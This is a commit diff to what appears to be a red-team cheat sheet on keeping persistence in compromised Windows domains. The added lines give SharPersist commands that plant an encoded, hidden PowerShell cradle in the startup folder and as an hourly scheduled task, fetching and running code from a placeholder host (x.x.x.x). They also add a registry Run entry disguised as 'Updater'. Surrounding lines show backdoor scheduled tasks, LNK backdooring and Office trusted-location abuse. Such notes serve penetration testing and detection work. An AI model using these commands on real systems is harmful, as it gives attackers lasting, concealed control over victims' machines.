Update Domain-Persistence.md

huaijinli · Mar 16, 2022 · 79c7c36 · 79c7c36
1 parent 69c35df
commit 79c7c36
Showing 1 changed file with 27 additions and 4 deletions.
diff --git a/windows-ad/Domain-Persistence.md b/windows-ad/Domain-Persistence.md
@@ -331,17 +331,32 @@ runas /netonly /user:<DOMAIN>\<COMPUTERACCOUNTNAME> powershell
 
 ## System persistence
 ### Userland
-#### Startup
+### Startup
 - Batch script inside user directory ```$env:APPDATA'\Microsoft\Windows\Start Menu\Programs\Startup\'```
 
-#### Registery keys
+#### Startup folder sharpersist.exe
+- Download an execute cradle as persistence
+```
+str='IEX ((new-object net.webclient).downloadstring("http://x.x.x.x/a"))'
+echo -en $str | iconv -t UTF-16LE | base64 -w 0
+SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64>" -f "UserEnvSetup" -m add
+```
+
+### Registery keys
 - https://attack.mitre.org/techniques/T1060/
 
-#### LNK
+#### Registery sharpersist.exe
+- ```-k``` is the registry key to modify.
+- ```-v``` is the name of the registry key to create.
+```
+SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
+```
+
+### LNK
 - Modify links to execute arbritary code
 - https://github.com/HarmJ0y/Misc-PowerShell/blob/master/BackdoorLNK.ps1
 
-#### Schtasks
+### Schtasks
 ```
 # Daily at 10:00
 schtasks /create /tn "NotEvil" /tr C:\backdoor.exe /sc daily /st 10:00
@@ -350,6 +365,14 @@ schtasks /create /tn "NotEvil" /tr C:\backdoor.exe /sc daily /st 10:00
 schtasks /create /tn "NotEvil" /tr C:\backdoor.exe /sc onidle /i 10
 ```
 
+##### schtask sharpersist.exe
+- Download an execute cradle as persistence
+```
+str='IEX ((new-object net.webclient).downloadstring("http://x.x.x.x/a"))'
+echo -en $str | iconv -t UTF-16LE | base64 -w 0
+SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <BASE64>" -n "Updater" -m add -o hourly
+```
+
 #### Microsoft Office Trusted Locations
 - Allow DLL or macros to execute despite the configured security settings (Ignored if macro's or add-ins have been blocked by GPO)
 - Create a new Excel document with a module containing the persistence mechanism. Save it as "Excel Add-in" inside ```%APPDATA%\Microsoft\Excel\XLSTART``` and it will be launched every tim the user opens MS Excel application.